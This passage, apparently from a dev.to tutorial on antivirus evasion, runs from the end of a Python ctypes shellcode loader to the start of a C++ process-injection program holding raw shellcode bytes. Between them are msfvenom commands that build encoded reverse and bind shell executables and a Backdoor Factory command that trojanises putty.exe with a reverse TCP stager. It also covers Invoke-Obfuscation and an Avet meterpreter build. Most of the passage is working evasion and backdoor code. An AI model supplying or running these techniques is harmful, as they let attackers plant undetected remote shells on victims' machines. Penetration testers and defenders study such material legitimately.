&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;RtlMoveMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                     &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                                     &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ht&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ht&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Shellcode Encoder
&lt;/h4&gt;

&lt;p&gt;I also recommend the following encoding tool:&lt;br&gt;
&lt;a href="https://github.com/ecx86/shellcode_encoder" rel="noopener noreferrer"&gt;https://github.com/ecx86/shellcode_encoder&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Beyond language-based shellcode encoding, one may also choose to &lt;strong&gt;encode the shellcode during generation&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;
  
  
  MSFVenom Example:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kali@kali:~&lt;span class="nv"&gt;$ &lt;/span&gt;msfvenom &lt;span class="nt"&gt;-l&lt;/span&gt; encoder

Framework Encoders &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nt"&gt;--encoder&lt;/span&gt; &amp;lt;value&amp;gt;]
&lt;span class="o"&gt;======================================&lt;/span&gt;

    Name                          Rank       Description
    &lt;span class="nt"&gt;----&lt;/span&gt;                          &lt;span class="nt"&gt;----&lt;/span&gt;       &lt;span class="nt"&gt;-----------&lt;/span&gt;
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;IFS&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     &lt;span class="nb"&gt;printf&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;1&lt;span class="o"&gt;)&lt;/span&gt; via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The &lt;span class="s2"&gt;"none"&lt;/span&gt; Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     &lt;span class="nb"&gt;stat&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;2&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nt"&gt;-based&lt;/span&gt; Context Keyed Payload Encoder
    x86/context_time              manual     &lt;span class="nb"&gt;time&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;2&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nt"&gt;-based&lt;/span&gt; Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder &lt;span class="o"&gt;(&lt;/span&gt;optimised&lt;span class="o"&gt;)&lt;/span&gt;
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Using Templates and Encoders
&lt;/h3&gt;

&lt;p&gt;Example usage:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/shell_reverse_tcp &lt;span class="nt"&gt;-x&lt;/span&gt; /usr/share/windows-binaries/plink.exe &lt;span class="nv"&gt;lhost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1.1.1.1 &lt;span class="nv"&gt;lport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;--platform&lt;/span&gt; win &lt;span class="nt"&gt;-f&lt;/span&gt; exe &lt;span class="nt"&gt;-o&lt;/span&gt; a.exe 

msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/shell/bind_tcp &lt;span class="nt"&gt;-x&lt;/span&gt; /usr/share/windows-binaries/plink.exe &lt;span class="nv"&gt;lhost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1.1.1.1 &lt;span class="nv"&gt;lport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 &lt;span class="nt"&gt;-e&lt;/span&gt; x86/shikata_ga_nai &lt;span class="nt"&gt;-i&lt;/span&gt; 5 &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;--platform&lt;/span&gt; win &lt;span class="nt"&gt;-f&lt;/span&gt; exe &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; b.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Veil Encryption:
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjd7u9ho4hsxojfmtrbw3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjd7u9ho4hsxojfmtrbw3.png" alt="Figure 15: Veil framework encryption options" width="800" height="589"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 15: Veil framework encryption options
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Schelper:
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnyypmrncli8at47p86eq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnyypmrncli8at47p86eq.png" alt="Figure 16: Schelper tool interface" width="800" height="358"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 16: Schelper tool interface
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Obfuscation (PowerShell):
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;Invoke-Obfuscation&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-ScriptBlock&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="n"&gt;echo&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;xss&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Command&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;'Encoding\1,Launcher\PS\67'&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Quiet&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8bmzcka3dz6xyv323a5z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8bmzcka3dz6xyv323a5z.png" alt="Figure 17: PowerShell obfuscation output" width="799" height="307"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 17: PowerShell obfuscation output
  &lt;p&gt;&lt;/p&gt;




&lt;p&gt;This concludes our discussion on &lt;strong&gt;shellcode encoding&lt;/strong&gt; for execution. Other programming languages follow similar principles and will not be enumerated further.&lt;/p&gt;

&lt;p&gt;The preceding examples addressed encoding and encryption of shellcode. Let us now explore &lt;strong&gt;shellcode injection&lt;/strong&gt; techniques.&lt;/p&gt;

&lt;h3&gt;
  
  
  B) Shellcode Injection Obfuscation
&lt;/h3&gt;

&lt;p&gt;A significant number of injection-based evasion techniques incorporate &lt;strong&gt;shellcode fragmentation&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The concept of &lt;strong&gt;fragmentation&lt;/strong&gt; is straightforward: analogous to fragmenting dangerous function names in PHP web shell obfuscation, shellcode can be similarly fragmented to evade detection.&lt;/p&gt;

&lt;p&gt;Shellcode fragmentation can involve &lt;strong&gt;relocating&lt;/strong&gt; the shellcode within the binary—for instance, by creating a new section, populating it with shellcode, and modifying the entry point to jump to the shellcode address before returning to the original program entry point.&lt;/p&gt;

&lt;p&gt;Alternatively, shellcode can be split across several &lt;strong&gt;code caves&lt;/strong&gt; (unused byte runs inside existing sections) and executed piece by piece, each fragment jumping on to the next. Conceptually this resembles the &lt;strong&gt;Omelet Shellcode&lt;/strong&gt; variant of egg-hunting, in which a small hunter stub locates several scattered "eggs" in memory and reassembles them before executing the result.&lt;/p&gt;




&lt;p&gt;Let us examine some injection examples:&lt;/p&gt;

&lt;h4&gt;
  
  
  Backdoor Factory (BDF):
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://github.com/secretsquirrel/the-backdoor-factory" rel="noopener noreferrer"&gt;https://github.com/secretsquirrel/the-backdoor-factory&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; In the backdoor module
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Checking &lt;span class="k"&gt;if &lt;/span&gt;binary is supported
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Gathering file info
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Reading win32 entry instructions
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Loading PE &lt;span class="k"&gt;in &lt;/span&gt;pefile
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Parsing data directories
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Looking &lt;span class="k"&gt;for &lt;/span&gt;and setting selected shellcode
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Creating win32 resume execution stub
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Looking &lt;span class="k"&gt;for &lt;/span&gt;caves that will fit the minimum shellcode length of 410
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; All caves lengths:  410
&lt;span class="c"&gt;############################################################&lt;/span&gt;
The following caves can be used to inject code and possibly
&lt;span class="k"&gt;continue &lt;/span&gt;execution.
&lt;span class="k"&gt;**&lt;/span&gt;Don&lt;span class="s1"&gt;'t like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 410
[*] Available caves: 
1. Section Name: DATA; Section Begin: 0x5df200 End: 0x665400; Cave begin: 0x65ea07 End: 0x65ec68; Cave Size: 609
3. Section Name: .rdata; Section Begin: 0x66a000 End: 0x66a200; Cave begin: 0x66a013 End: 0x66a200; Cave Size: 493
4. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8203f End: 0xc82308; Cave Size: 713
5. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc82e1c End: 0xc83050; Cave Size: 564
6. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc830eb End: 0xc83718; Cave Size: 1581
7. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc83b64 End: 0xc840fc; Cave Size: 1432
8. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc843ff End: 0xc846c8; Cave Size: 713
9. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc851dc End: 0xc85410; Cave Size: 564
10. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc854ab End: 0xc859d0; Cave Size: 1317
11. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc86557 End: 0xc86b84; Cave Size: 1581
12. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc86fd0 End: 0xc87568; Cave Size: 1432
13. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8760a End: 0xc87a32; Cave Size: 1064
14. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc886af End: 0xc88d58; Cave Size: 1705
15. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8b8b3 End: 0xc8bdd8; Cave Size: 1317
16. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8eaba End: 0xc8ed65; Cave Size: 683
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Multi-cave ("cave jumping") injection in BDF is selected with the &lt;code&gt;-J&lt;/code&gt;/&lt;code&gt;--cave_jumping&lt;/code&gt; flag rather than &lt;code&gt;-F&lt;/code&gt; as originally stated; confirm the flag names against &lt;code&gt;backdoor-factory -h&lt;/code&gt; for the version installed. The &lt;code&gt;-s show&lt;/code&gt; form in the first command below lists the available payloads:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;backdoor-factory &lt;span class="nt"&gt;-f&lt;/span&gt; putty.exe &lt;span class="nt"&gt;-s&lt;/span&gt; show
backdoor-factory &lt;span class="nt"&gt;-f&lt;/span&gt; putty.exe &lt;span class="nt"&gt;-s&lt;/span&gt; iat_reverse_tcp_stager_threaded &lt;span class="nt"&gt;-H&lt;/span&gt; 192.168.15.135 &lt;span class="nt"&gt;-P&lt;/span&gt; 4444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Shellter:
&lt;/h4&gt;

&lt;p&gt;In Shellter the 'A' choice selects the &lt;em&gt;Auto&lt;/em&gt; operation mode (as opposed to 'M', Manual), in which the tool traces the target's execution and injects the payload into the existing code section rather than appending a new one; the figure below shows the options presented at that point.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fo4v7nhmbnzgi3nko2de0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fo4v7nhmbnzgi3nko2de0.png" alt="Figure 18: Shellter section injection options" width="800" height="365"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 18: Shellter section injection options
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Avet:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root@kali:/tmp/avet/build# leafpad build_win64_meterpreter_rev_tcp_xor_fopen.sh 

&lt;span class="nv"&gt;lhost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134

root@kali:/tmp/avet/build# &lt;span class="nb"&gt;cd&lt;/span&gt; ..

root@kali:/tmp/avet# ./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh

No Arch selected, selecting Arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;iteration&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;)&lt;/span&gt;
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of c file: 2339 bytes
./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh: line 6: ./make_avet: cannot execute binary file: Exec format error
avet.c: In &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="s1"&gt;'main'&lt;/span&gt;:
avet.c:122:15: error: &lt;span class="s1"&gt;'buf'&lt;/span&gt; undeclared &lt;span class="o"&gt;(&lt;/span&gt;first use &lt;span class="k"&gt;in &lt;/span&gt;this &lt;span class="k"&gt;function&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
   shellcode &lt;span class="o"&gt;=&lt;/span&gt; buf&lt;span class="p"&gt;;&lt;/span&gt;
               ^
avet.c:122:15: note: each undeclared identifier is reported only once &lt;span class="k"&gt;for &lt;/span&gt;each &lt;span class="k"&gt;function &lt;/span&gt;it appears &lt;span class="k"&gt;in&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Note that this transcript shows a &lt;em&gt;failed&lt;/em&gt; build, not a successful one: &lt;code&gt;./make_avet&lt;/code&gt; is rejected with &lt;em&gt;Exec format error&lt;/em&gt; (the shipped binary does not match the host it is run on, so it most likely has to be recompiled from source), and because it never ran the encoded payload was not written into &lt;code&gt;avet.c&lt;/code&gt;, which is the likely reason the compiler then reports &lt;code&gt;'buf' undeclared&lt;/code&gt;. No output executable is produced until the first error is fixed.&lt;/p&gt;



&lt;h4&gt;
  
  
  Legitimate Process Injection
&lt;/h4&gt;

&lt;p&gt;Shellcode can also be injected by hand into a separate, innocuous-looking process. The example below does not attach to an already-running process: it launches &lt;code&gt;calc.exe&lt;/code&gt; from the system directory with &lt;code&gt;CREATE_SUSPENDED&lt;/code&gt;, allocates RWX memory in the new process with &lt;code&gt;VirtualAllocEx&lt;/code&gt;, copies the shellcode in with &lt;code&gt;WriteProcessMemory&lt;/code&gt; and runs it via &lt;code&gt;CreateRemoteThread&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"stdafx.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;Windows.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt;&lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"iostream"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xb8\x72\xd9\xb8\x52\xda\xd8\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x7d\x3b\x4d\xae\x69\x39&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xae\x4f\x69\x5e\x26\xaa\x58\x5e\x5c\xbe\xca\x6e\x16\x92\xe6&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x05\x7a\x07\x7d\x6b\x53\x28\x36\xc6\x85\x07\xc7\x7b\xf5\x06&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x4b\x86\x2a\xe9\x72\x49\x3f\xe8\xb3\xb4\xb2\xb8\x6c\xb2\x61&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x2d\x19\x8e\xb9\xc6\x51\x1e\xba\x3b\x21\x21\xeb\xed\x3a\x78&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x2b\x0f\xef\xf0\x62\x17\xec\x3d\x3c\xac\xc6\xca\xbf\x64\x17&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x32\x13\x49\x98\xc1\x6d\x8d\x1e\x3a\x18\xe7\x5d\xc7\x1b\x3c&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x1c\x13\xa9\xa7\x86\xd0\x09\x0c\x37\x34\xcf\xc7\x3b\xf1\x9b&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x80\x5f\x04\x4f\xbb\x5b\x8d\x6e\x6c\xea\xd5\x54\xa8\xb7\x8e&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xf5\xe9\x1d\x60\x09\xe9\xfe\xdd\xaf\x61\x12\x09\xc2\x2b\x7a&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
